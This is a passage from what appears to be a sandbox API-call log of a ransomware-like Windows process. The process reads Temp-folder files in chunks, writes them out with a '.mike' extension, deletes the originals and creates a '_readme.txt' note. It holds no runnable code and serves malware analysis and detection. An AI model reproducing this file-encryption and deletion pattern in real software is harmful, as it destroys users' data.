lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike", lpFilePart=0x0) returned 0x4c [0147.499] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps.mike"), fInfoLevelId=0x0, lpFileInformation=0x21bfccc | out: lpFileInformation=0x21bfccc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x212d3c60, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x212d3c60, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x2131ff20, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x17c70)) returned 1 [0147.499] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.500] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", dwFileAttributes=0x80) returned 1 [0147.500] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.500] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps")) returned 1 [0147.502] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.502] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\thzmiqt0q-s9l18rwl.pps"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\THzMIQT0Q-S9l18rwl.pps", lpFilePart=0x0) returned 0x47 [0147.503] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt", lpFilePart=0x0) returned 0x3c [0147.503] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d4 [0147.504] GetFileType (hFile=0x1d4) returned 0x1 [0147.504] GetFileType (hFile=0x1d4) returned 0x1 [0147.504] WriteFile (in: hFile=0x1d4, lpBuffer=0x21c1960*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af0b8, lpOverlapped=0x0 | out: lpBuffer=0x21c1960*, lpNumberOfBytesWritten=0x2af0b8*=0x45e, lpOverlapped=0x0) returned 1 [0147.506] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.506] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.506] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.507] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.507] GetFileType (hFile=0x1d4) returned 0x1 [0147.507] GetFileType (hFile=0x1d4) returned 0x1 [0147.507] CloseHandle (hObject=0x1d4) returned 1 [0147.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.508] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0147.509] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), fInfoLevelId=0x0, lpFileInformation=0x21c48a4 | out: lpFileInformation=0x21c48a4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b0a9ec0, ftCreationTime.dwHighDateTime=0x1d4cb75, ftLastAccessTime.dwLowDateTime=0x2b786b20, ftLastAccessTime.dwHighDateTime=0x1d4d3f4, ftLastWriteTime.dwLowDateTime=0x2b786b20, ftLastWriteTime.dwHighDateTime=0x1d4d3f4, nFileSizeHigh=0x0, nFileSizeLow=0xcb69)) returned 1 [0147.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), fInfoLevelId=0x0, lpFileInformation=0x21c4b80 | out: lpFileInformation=0x21c4b80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b0a9ec0, ftCreationTime.dwHighDateTime=0x1d4cb75, ftLastAccessTime.dwLowDateTime=0x2b786b20, ftLastAccessTime.dwHighDateTime=0x1d4d3f4, ftLastWriteTime.dwLowDateTime=0x2b786b20, ftLastWriteTime.dwHighDateTime=0x1d4d3f4, nFileSizeHigh=0x0, nFileSizeLow=0xcb69)) returned 1 [0147.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.510] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.510] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.511] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.511] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.511] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.512] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.512] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0147.512] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.514] GetFileType (hFile=0x1d4) returned 0x1 [0147.514] GetFileType (hFile=0x1d4) returned 0x1 [0147.514] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0147.515] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), fInfoLevelId=0x0, lpFileInformation=0x21c53b4 | out: lpFileInformation=0x21c53b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b0a9ec0, ftCreationTime.dwHighDateTime=0x1d4cb75, ftLastAccessTime.dwLowDateTime=0x2b786b20, ftLastAccessTime.dwHighDateTime=0x1d4d3f4, ftLastWriteTime.dwLowDateTime=0x2b786b20, ftLastWriteTime.dwHighDateTime=0x1d4d3f4, nFileSizeHigh=0x0, nFileSizeLow=0xcb69)) returned 1 [0147.516] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.516] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.516] GetFileType (hFile=0x1d4) returned 0x1 [0147.517] GetFileType (hFile=0x1d4) returned 0x1 [0147.517] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0147.517] ReadFile (in: hFile=0x1d4, lpBuffer=0x21c6958, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21c6958*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.518] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.519] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.519] GetFileType (hFile=0x1d4) returned 0x1 [0147.519] GetFileType (hFile=0x1d4) returned 0x1 [0147.519] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0147.520] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.520] GetFileType (hFile=0x1d4) returned 0x1 [0147.520] GetFileType (hFile=0x1d4) returned 0x1 [0147.521] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0147.521] ReadFile (in: hFile=0x1d4, lpBuffer=0x21d38d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21d38d8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.521] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.522] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.522] GetFileType (hFile=0x1d4) returned 0x1 [0147.522] GetFileType (hFile=0x1d4) returned 0x1 [0147.522] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0147.523] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.523] GetFileType (hFile=0x1d4) returned 0x1 [0147.524] GetFileType (hFile=0x1d4) returned 0x1 [0147.524] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0147.524] ReadFile (in: hFile=0x1d4, lpBuffer=0x21e0858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21e0858*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.525] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.525] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.525] GetFileType (hFile=0x1d4) returned 0x1 [0147.525] GetFileType (hFile=0x1d4) returned 0x1 [0147.525] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0147.526] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.526] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.526] GetFileType (hFile=0x1d4) returned 0x1 [0147.527] GetFileType (hFile=0x1d4) returned 0x1 [0147.527] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0147.527] ReadFile (in: hFile=0x1d4, lpBuffer=0x21ed7d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21ed7d8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.528] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.528] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.528] GetFileType (hFile=0x1d4) returned 0x1 [0147.528] GetFileType (hFile=0x1d4) returned 0x1 [0147.528] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0147.529] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.529] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.530] GetFileType (hFile=0x1d4) returned 0x1 [0147.530] GetFileType (hFile=0x1d4) returned 0x1 [0147.530] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0147.530] ReadFile (in: hFile=0x1d4, lpBuffer=0x21fa758, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x21fa758*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.532] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike", lpFilePart=0x0) returned 0x3e [0147.532] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.533] GetFileType (hFile=0x1d4) returned 0x1 [0147.533] GetFileType (hFile=0x1d4) returned 0x1 [0147.533] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0147.534] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv", lpFilePart=0x0) returned 0x39 [0147.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\TJio.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\tjio.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, 